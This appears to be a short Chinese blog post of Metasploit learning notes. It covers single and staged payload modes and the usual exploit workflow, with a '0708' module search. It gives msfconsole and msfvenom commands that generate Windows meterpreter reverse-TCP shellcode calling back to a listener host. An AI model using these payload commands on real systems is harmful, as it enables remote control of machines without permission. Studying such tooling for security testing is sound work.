漏洞攻击

MSF攻击模式

  1. single:直接发送一个利用脚本
  2. stage:先发送一个stager建立连接,再发送一个stage利用脚本

攻击步骤

  1. search name:0708–搜索带有0708字样的模块
  2. use exploit模块 --使用模块
  3. show options – 查看配置
  4. set … – 设置配置
  5. check --漏洞检测(可省略)
  6. use – 使用exploit模块攻击

Metasploit生成shellcode

在msfconsole生成

use payload/windows/x64/meterpreter/reverse_tcp
set lhost 192.168.124.26
generate -f python

在msfvenom中生成

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST 192.168.124.26 LPORT 4444 -f python -v user_payload


去除多余0x00字节

Metasploit(二)相关推荐

  1. Metasploit入门用法(主动攻击)

    –作者:CV 本文主要讲metasploit的入门用法,还有一些渗透细节和思路,有不足的,欢迎互相学习研究.本人区别于书籍的特点是:书籍以模块为划分,我是以连续的步骤进行书写,更突出一次渗透的思路,同 ...

  2. Metasploit是一款开源的安全漏洞检测工具,

    Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,适合于需要核实漏洞的安全专家,同时也适合于强大进攻能力的 ...

  3. HW弹药库之红队作战手册

    本文作者:阿乐你好 上个月5月9号发了两个HW红方弹药库的,今天再来发一个红队作战人员手册,我大概看了看手册里面的exp零组文档包含了很多, 本文来自 klionsec的github 说明 以下仅针对 ...

  4. metasploit 快速入门(二)信息收集和扫描-续

    目录 一.与Nessus结合 二.与NeXpose结合 三.与OpenVAS结合 一.与Nessus结合 到目前为止,我们已经了解了端口扫描的基础知识,以及学会了Nmap的使用.通过其他一些工具的学习 ...

  5. [网络安全提高篇] 一〇二.Metasploit技术之基础用法万字详解及防御机理

    当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...

  6. metasploit快速入门(二)收集信息

    目录 简介 1 使用Metasploit进行被动信息收集 2 使用Metasploit进行主动信息收集 3 端口扫描:Nmap 方式 4 端口扫描:db_nmap 方式 5 基于ARP的主机发现 6 ...

  7. Metasploit工具学习(二)

    Metasploit持久化 metsvc persistence 通过上一篇我们使用smb的ms17-010(永恒之蓝)获得了操作权限,这个时候我们需要让下一次连接的时候直接连上,而不是重新再打一次, ...

  8. 无线网络渗透测试系列学习(二) - 在VMware中搭建Metasploit靶机的详细步骤以及端口的简单了解

    引言: 无线网络渗透测试系列学习目录: 无线网络渗透测试系列学习(一) - 在Windows系统下使用虚拟机安装Kali Linux操作系统 在上一篇文章中我们讲解了在Windows下如何在VMwar ...

  9. Kali linux 2016.2(Rolling)里Metasploit的OpenVAS

    关于OpenAVS的概念,我这里不多赘述. 前提得,大家要先安装好OpenVAS!!! 我们都知道,BT5中已经预先安装好了OpenVAS网络漏洞扫描工具,我们只需进行一些配置即可. 具体,请见我下面 ...

最新文章

  1. vue单选,多选,多选的内容显示在页面可删除
  2. 基于Delta lake、Hudi格式的湖仓一体方案
  3. linux 查询oracle情况,在Linux下使用SQLPlus查看Oracle数据库表空间及使用率
  4. 机器学习算法(6)——随机森林
  5. java Servlet Session
  6. gdal读写图像分块处理
  7. 纯PHP实现定时器任务(Timer)
  8. Spring Cloud 2020 版本最佳实践,你落伍了!
  9. 亚像素边缘提取方法总结
  10. 手机注册短信验证码实现的全流程及代码
  11. C语言-基础入门-学习笔记(13):结构体
  12. K60 FTM定时器 定时中断
  13. 计算机基础(2)— windows 防火墙对FTP服务器、HTTP服务器的影响
  14. Python开发——8.模块
  15. 三星android怎么获取root,三星S8如何获取ROOT权限_三星S8ROOT获取教程
  16. Python OpenCV 图片滑块验证码 滑块图片验证码 快速自动识别方案 代码简单 模板匹配识别 识别成功率达90%+
  17. 真的必须要在主线程更新UI吗?
  18. mysql压缩版安装教程 for Mac
  19. 开发者成长激励计划-基于TencentOS Tiny FDM 3D打印机云控制系统方案
  20. 计算器软件测试数据,计算器软件测试报告.pdf

热门文章

  1. 数据库管理系统有哪些
  2. 世界坐标系,相机坐标系,图像坐标系,像素坐标系转换
  3. 微信小程序自定义搜索导航栏
  4. 球形/PH响应性的树枝状聚合物:树枝状聚酰胺PAMAM/His-PAMAM/DNA 聚酰胺偶联组氨酸/的制备流程
  5. hmailserver搭建一个公网可收发的自用邮局
  6. python学习之 利用蒙特卡洛方法计算PI值
  7. GitHub高赞!PyTorch Lightning 你值得拥有!
  8. 第二节 python知识点梳理
  9. 北大光华管理学院公开课北京站
  10. matlab算sma,[转载]通达信公式SMA函数计算方式的问题